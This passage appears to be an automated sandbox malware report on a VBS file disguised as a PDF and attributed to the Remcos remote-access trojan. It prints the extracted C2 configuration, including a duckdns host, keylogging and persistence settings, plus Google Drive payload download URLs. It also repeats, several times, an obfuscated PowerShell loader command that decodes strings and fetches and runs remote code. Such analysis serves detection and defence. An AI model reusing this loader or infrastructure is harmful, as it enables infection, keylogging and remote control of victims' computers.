ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:46:28.837001+020028032702Potentially Bad Traffic192.168.2.849708172.217.16.206443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for domain / URL
              Source: a458386d9.duckdns.orgVirustotal: Detection: 13%Perma Link
              Multi AV Scanner detection for submitted file
              Source: A 413736796#U00b7pdf.vbsVirustotal: Detection: 11%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921976127.0000000008A50000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb4 source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdbht source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdbk source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: a458386d9.duckdns.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49708 -> 172.217.16.206:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP2
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.000002918190F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcP
              Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcXRul
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download
              Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49709 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_8088.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio FritlJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B22C0222_2_00007FFB4B22C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B22B2762_2_00007FFB4B22B276
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2FA09A2_2_00007FFB4B2FA09A
              Source: A 413736796#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6838
              Source: unknownProcess created: Commandline size = 6838
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6838Jump to behavior
              Source: amsi32_8088.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Sternman224.IllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fi2q2dr.4qz.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7756
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8088
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: A 413736796#U00b7pdf.vbsVirustotal: Detection: 11%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr 